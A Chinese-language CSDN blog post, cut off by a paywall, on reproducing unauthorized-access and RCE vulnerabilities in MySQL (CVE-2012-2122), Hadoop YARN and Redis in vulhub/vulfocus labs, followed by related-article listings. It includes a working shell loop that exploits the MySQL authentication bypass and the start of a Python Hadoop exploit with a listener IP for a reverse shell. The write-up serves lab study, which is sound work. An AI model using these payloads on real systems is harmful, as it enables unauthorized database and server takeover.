数据库服务安全--Mysql未授权--Hadoop未授权配合RCE--Redis未授权&RCE

最新推荐文章于 2024-05-12 22:16:26 发布
最新推荐文章于 2024-05-12 22:16:26 发布
阅读量2.2k 收藏 2
点赞数 2
文章标签: 数据库 mysql hadoop redis 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68243135/article/details/127972490
版权

前言:昨天做了几个靶场,分享一下成果。

 

首先我们了解一下服务安全,服务安全测试流程第一步就是判断服务开放(1.端口扫描2.组合猜解3.信息来源),如果一个服务都没开启那么我们是无法漏洞利用的;其次是判断服务类型(1.数据库2.文件传输3.远程控制4.数据通讯等);最后判断利用方式(1.特性漏洞2.未授权访问3.弱口令爆破)。端口即服务(服务安全的前提是看服务有没有开放),信息来源是通过报错、网站的源码等来源。

本文知识点:

1.Mysql--CVE-2012-2122

2.Hadoop--配置不当未授权三重奏&RCE漏洞

3.Redis--配置不当未授权三重奏&RCE两漏洞

Mysql--未授权访问-CVE-2012-2122利用

复现环境:vulhub 内置端口3306

pyload:for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

该漏洞利用比较简单,原理就是利用for循环去猜解他的账号密码,当尝试多次以后就会直接进入数据库(逻辑错误)--报错报错突然就进去了。

Mysql的弱口令猜解有一定的限制:

mysql默认配置本地登录root用户,远程的连接请求拒绝 

但是我们可以借助phpmyadmin猜解,phpmyadmin第三方的数据库管理应用 搭建在对方的服务器;phpmyadmin登录mysql数据库,这个数据库发送是由本地到本地的过程 所以可以进行测试。

Hadoop--未授权访问-内置配合命令执行RCE(端口:50010等)

复现环境:vulfocus

EXP:

import requests
target = '目标 ip'
lhost = '监听ip' # put your local host ip here
最低0.47元/天 解锁文章
LaPluie985
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现】Hadoop 授权访问到RCE
Fly_鹏程万里
06-20 138
Hadoop Hadoop是一个开源的分布式计算框架,用于存储和处理大规模数据集,它提供了可靠、可扩展和高性能的数据处理能力,使得用户可以在廉价的硬件集群上进行大数据处理和分析,Hadoop适用于处理大规模的结构化和非结构化数据并且在处理大数据集时具有良好的可扩展性和容错性,它被广泛应用于互联网公司、科学研究、金融行业等领域,用于大数据处理、日志分析、机器学习和数据挖掘等任务,而由于服务器直接在开放了Hadoop机器HDFS的50070 Web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,
hadoop-3.3.4 版本(最新版)
12-14
Apache Hadoophadoop-3.3.4.tar.gz)项目为可靠、可扩展的分布式计算开发开源软件。官网下载速度非常缓慢,因此将hadoop-3.3.4 版本放在这里,欢迎大家来下载使用! Hadoop 架构是一个开源的、基于 Java 的编程...
服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&授权访问&RCE-漏洞复现
ran的博客
05-05 3178
因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。
Hadopp授权访问导致RCE
qq_69775412的博客
01-25 900
Hadoop是一个开源的分布式计算框架,用于处理大规模数据集的存储和处理。它基于Google的MapReduce算法和Google File System(GFS)的论文,旨在提供一个可靠、可扩展、分布式存储和处理大规模数据的解决方案。漏洞产生原因:负责对资源进行同一管理调度的 ReasourceManager 组件的UI管理界面开放在 8080/8088 端口,攻击者无需认证即可通过REST API 部署任务来执行任意命令,最终可完全控制集群中所有的机器。
数据库安全Hadoop 授权访问-命令执行漏洞.
网络安全领域___专研者.
11-10 3564
Hadoop 授权访问主要因HadoopYARN资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
Hadoop Yarn RPC远程命令执行
Fly_鹏程万里
11-25 5869
影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在授权访问漏洞,此漏洞存在于Hadoop的核心组件Hadoop Yarn中,因Hadoop Yarn默认对外开放RPC服务,导致远程攻击者可利用此授权漏洞并通过RPC服务执行任意命令,从而达到控制目标服务器的目的,鉴于此漏洞为高危状态,危害较大,且细节已公开、被在野利用,建议所有使用Apache Hadoop的用户及时
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1384
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
mysql-connector-java-6.0.6.jar
最新发布
05-30
MySQL是世界上最受欢迎的关系型数据库管理系统(RDBMS)之一,由Oracle公司开发和维护。它以其开源、免费、高效和可扩展性而受到广大开发者喜爱。`mysql-connector-java-6.0.6.jar`是MySQL提供的Java数据库连接器,...
hadoop_mysql-libs.rar 在linux用
06-16
Hadoop是一个开源的分布式计算框架,而MySQL是一个广泛使用的开源关系型数据库管理系统。它们经常一起用于大数据处理和分析场景,将数据存储在MySQL中,通过Hadoop进行分布式计算。 描述中的 "hadoop_mysql-libs....
hudi-hadoop-mr-bundle-0.11.0.jar
06-28
hudi-hadoop-mr-bundle-0.11.0.jar 配合文档
Hadoop下载 hadoop-3.3.3.tar.gz
07-06
Hadoop是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不了解分布式底层细节的情况下,开发分布式程序。充分利用集群的威力进 Hadoop是一个由Apache基金会所开发的分布式系统基础架构。用户可以在不...
hadoop-common-bin2.7
06-21
3. **安全性**:2.7.4版本加强了安全性特性,包括认证、授权和审计。在IDEA中,开发时需要配置安全相关的参数,如kerberos认证,以确保集群的安全运行。 4. **配置管理**:Hadoop Common提供了一套灵活的配置系统,...
hadoop-annotations-2.6.5-API文档-中文版.zip
04-07
赠送jar包:hadoop-annotations-2.6.5.jar 赠送原API文档:hadoop-annotations-2.6.5-javadoc.jar 赠送源代码:hadoop-annotations-2.6.5-sources.jar 包含翻译后的API文档:hadoop-annotations-2.6.5-javadoc-...
hadoop-2.6.0-cdh5.16.2的压缩包.rar
12-17
主要是因为hadoop的cdh5官网收费,项目下载不了了,上传我下载的到csdn方便各位下载
hadoop-auth-2.9.1-API文档-中文版.zip
04-07
赠送jar包:hadoop-auth-2.9.1.jar 赠送原API文档:hadoop-auth-2.9.1-javadoc.jar 赠送源代码:hadoop-auth-2.9.1-sources.jar 包含翻译后的API文档:hadoop-auth-2.9.1-javadoc-API文档-中文(简体)版.zip 对应...
hadoop-common-2.6.5-API文档-中文版.zip
04-07
赠送jar包:hadoop-common-2.6.5.jar 赠送原API文档:hadoop-common-2.6.5-javadoc.jar 赠送源代码:hadoop-common-2.6.5-sources.jar 包含翻译后的API文档:hadoop-common-2.6.5-javadoc-API文档-中文(简体)版....
数据库漏洞(授权访问+RCE)-Mysql+Hadoop
xiaoheizi的博客
07-09 703
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务服务默认端口3306。启动漏洞环境,访问漏洞地址http://123.58.224.8:32561 即可看到Hadoop YARN ResourceManager WebUI页面。猜测可能存在Mysql 身份认证绕过漏洞,于是尝试复现漏洞。漏洞利用:反弹shell。
Hadoop-授权访问-内置配合命令执行RCE
MateSnake的博客
05-12 692
Hadoop-授权访问-内置配合命令执行RCE
Hadoop Yarn RPC授权远程代码执行漏洞复现
Armandhe的博客
11-15 2446
Hadoop Yarn RPC授权远程代码执行漏洞第一时间复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值